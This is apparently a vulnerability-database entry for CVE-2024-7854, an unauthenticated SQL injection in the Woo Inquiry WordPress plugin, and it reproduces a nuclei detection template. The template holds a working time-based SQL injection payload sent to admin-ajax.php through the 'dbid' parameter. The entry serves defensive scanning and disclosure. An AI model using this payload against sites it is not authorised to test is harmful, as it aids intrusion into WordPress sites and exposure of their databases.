Lucene search
K

Woo Inquiry <= 0.1 - SQL Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Woo Inquiry plugin for WordPress <= 0.1 is vulnerable to SQL Injection allowing unauthenticated attackers to extract sensitive information from the database

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for SQL Injection in Sjhoo Woo_Inquiry
4 Oct 202414:59
githubexploit
Circl
CVE-2024-7854
21 Aug 202409:01
circl
CNNVD
WordPress plugin Ultimate Store Kit 安全漏洞
21 Aug 202400:00
cnnvd
CVE
CVE-2024-7854
21 Aug 202405:30
cve
Cvelist
CVE-2024-7854 Woo Inquiry <= 0.1 - Unauthenticated SQL Injection
21 Aug 202405:30
cvelist
NVD
CVE-2024-7854
21 Aug 202406:15
nvd
OSV
CVE-2024-7854
21 Aug 202406:15
osv
Patchstack
WordPress Woo Inquiry Plugin <= 0.1 is vulnerable to SQL Injection
21 Aug 202400:00
patchstack
Patchstack
WordPress Woo Inquiry plugin <= 0.1 - Unauthenticated SQL Injection vulnerability
21 Aug 202401:49
patchstack
Positive Technologies
PT-2024-38631 · WordPress · Woo Inquiry
20 Aug 202400:00
ptsecurity
Rows per page
id: CVE-2024-7854

info:
  name: Woo Inquiry <= 0.1 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    The Woo Inquiry plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 0.1 due to insufficient escaping on the user supplied parameter 'dbid' and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can exploit SQL injection to extract, modify, or delete sensitive database information, potentially compromising user credentials and the entire WordPress site.
  remediation: |
    Remove or update the Woo Inquiry plugin to a version later than 0.1 that addresses the SQL injection vulnerability in the dbid parameter.
  reference:
    - https://github.com/RandomRobbieBF/CVE-2024-7854
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/312a6601-c914-4661-82ff-6f8bac849442?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7854
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-7854
    cwe-id: CWE-89
    epss-score: 0.04317
    epss-percentile: 0.89994
    cpe: cpe:2.3:a:sjhoo:woo_inquiry:0.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: sjhoo
    product: woo_inquiry
    framework: wordpress
    publicwww-query: "/wp-content/plugins/woo-inquiry"
  tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,woo-inquiry,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/wp-content/plugins/woo-inquiry")'
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=woo_wpinq_times_up&dbid=(SELECT(0)FROM(SELECT(SLEEP(6)))a)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022019387875d0622db5d9263f6ea880d0fc0b1b72c088dbe79f99c9a235248c4f7502200fa269c307699a887c90936e526112ee864916bbd137c90a0a534d16e6668fcd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8 - 10
EPSS0.04317
SSVC
26